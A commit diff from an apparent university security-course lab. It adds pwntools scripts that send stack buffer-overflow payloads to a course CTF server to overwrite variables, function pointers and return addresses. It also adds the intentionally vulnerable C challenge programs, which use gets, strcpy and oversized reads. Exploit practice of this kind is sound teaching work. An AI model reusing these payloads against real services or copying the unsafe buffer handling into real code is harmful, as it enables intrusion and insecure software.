Lab6

pa/.gitignore

@@ -1,2 +1,3 @@
 **.vscode/
 **__pycache__/
+**.gdb_history

pa/lab6/chall_calling_functions.py

@@ -0,0 +1,12 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25153
+
+WIN_ADDR = 0x080486f1
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("?\n")
+conn.send(b"\x55"*32 + b"\xf1\x86\x04\x08\n")
+conn.interactive()

pa/lab6/chall_match_an_exact_value.py

@@ -0,0 +1,10 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25152
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("?\n")
+conn.send(b"\x55"*64 + b"dcba\n")
+conn.interactive()

pa/lab6/chall_return_address.py

@@ -0,0 +1,12 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25154
+
+WIN_ADDR = 0x080486f1
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("'\n")
+conn.send(b"\x55"*0x12 + b"\xaa"*4 + b"\xf1\x86\x04\x08\n")
+conn.interactive()

pa/lab6/chall_simple_overflow.py

@@ -0,0 +1,10 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25151
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("0.\n")
+conn.send(b"\x55"*128 + b"\x01\n")
+conn.interactive()

pa/lab6/chall_super_secure_lottery.py

@@ -0,0 +1,10 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25161
+
+conn = remote(HOST, PORT)
+conn.recvuntil(b":")
+pl = b"\x55"*(64)
+conn.send(pl)
+print(conn.recvline())

pa/lab6/chall_super_secure_system.py

@@ -0,0 +1,15 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25155
+
+WIN_ADDR = p32(0x080487d9)
+EBX = p32(0x804a001) # Has NULL byte
+EBP = p32(0xffffcdd8)
+
+#conn = process("./check")
+conn = remote(HOST, PORT)
+pl = b"\x55"*0x24 + EBX + EBP + WIN_ADDR
+input()
+conn.send(pl)
+conn.interactive()

pa/lab6/check.c

@@ -0,0 +1,30 @@
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+#include "general.h"
+
+int check_password(char* password) {
+  char buffer[32];
+
+  strcpy(buffer, password);
+
+  if(strcmp(buffer, getflag()) == 0)
+    return 1;
+
+  return 0;
+}
+
+int main() {
+  init();
+
+  char pass[64] = {0};
+  // we know how to make this secure. No gets in here.
+  read(0, pass, 63);
+
+  if(check_password(pass)){
+      printf("Welcome back! Here is the secret flag that you already knew: %s\n", getflag());
+  } else {
+      printf("Unauthorized user/passwd\n");
+  }
+}

pa/lab6/functions.c

@@ -0,0 +1,27 @@
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+#include "general.h"
+
+void win() {
+  printf("Congratulations, you win!!! You successfully changed the code flow\n");
+  printf("Flag: %s\n", getflag());
+}
+
+int main() {
+  init();
+  int (*fp)();
+  char buffer[32];
+
+  fp = 0;
+
+  printf("You win this game if you are able to call the function win. Can you do it?\n");
+
+  gets(buffer);
+
+  if(fp) {
+      printf("Calling function pointer... jumping to %p\n", fp);
+      fp();
+  }
+}

pa/lab6/lottery.c

@@ -0,0 +1,37 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include "general.h"
+
+#define GUESS_SIZE 64
+#define LOTTERY_LEN 8
+
+void run_lottery(const char* prize) {
+    char guess[LOTTERY_LEN] = {0};
+
+    while (1) {
+        printf("What is your guess: ");
+        read(0, guess, GUESS_SIZE);
+
+        if (!memcmp(prize, guess, LOTTERY_LEN)) {
+            printf("Congratulations! You won the lottery: %s\n", getflag());
+        } else {
+            puts("Wrong guess. Do you want to play again?");
+        }
+    }
+}
+
+int main() {
+    init();
+    char lottery[LOTTERY_LEN];
+
+    int fd = open("/dev/urandom", O_RDONLY);
+    read(fd, lottery, LOTTERY_LEN);
+    close(fd);
+
+    run_lottery(lottery);
+}

pa/lab6/match.c

@@ -0,0 +1,24 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+#include "general.h"
+
+int main() {
+  init();
+  int test;
+  char buffer[64];
+
+  printf("You win this game if you can change variable test to the value 0x61626364. Have you noticed that the ascii code of 'a' is 0x61?\n");
+
+  test = 0;
+  gets(buffer);
+
+  if (test == 0x61626364) {
+      printf("Congratulations, you win!!! You correctly got the variable to the right value\n");
+      printf("Flag: %s\n", getflag());
+  } else {
+      printf("Try again, you got 0x%08x, instead of 0x61626364\n", test);
+  }
+}

pa/lab6/return.c

@@ -0,0 +1,22 @@
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+#include "general.h"
+
+void win() {
+  printf("Congratulations, you win!!! You successfully changed the code flow\n");
+  printf("Flag, %s\n", getflag());
+}
+
+void challenge() {
+  char buffer[10];
+  printf("You win this game if you are able to call the function win.'\n");
+  gets(buffer);
+}
+ 
+int main() {
+  init();
+  challenge();
+  return 0;
+}

pa/lab6/simple.c

@@ -0,0 +1,23 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include "general.h"
+
+int main() {
+  init();
+  int test;
+  char buffer[128];
+
+  printf("You win this game if you change variable test to a value different from 0.\n");
+
+  test = 0;
+  gets(buffer);
+
+  if(test != 0) {
+      printf("YOU WIN!\n");
+      printf("Flag: %s\n", getflag());
+  } else {
+      printf("Try again...\n");
+  }
+}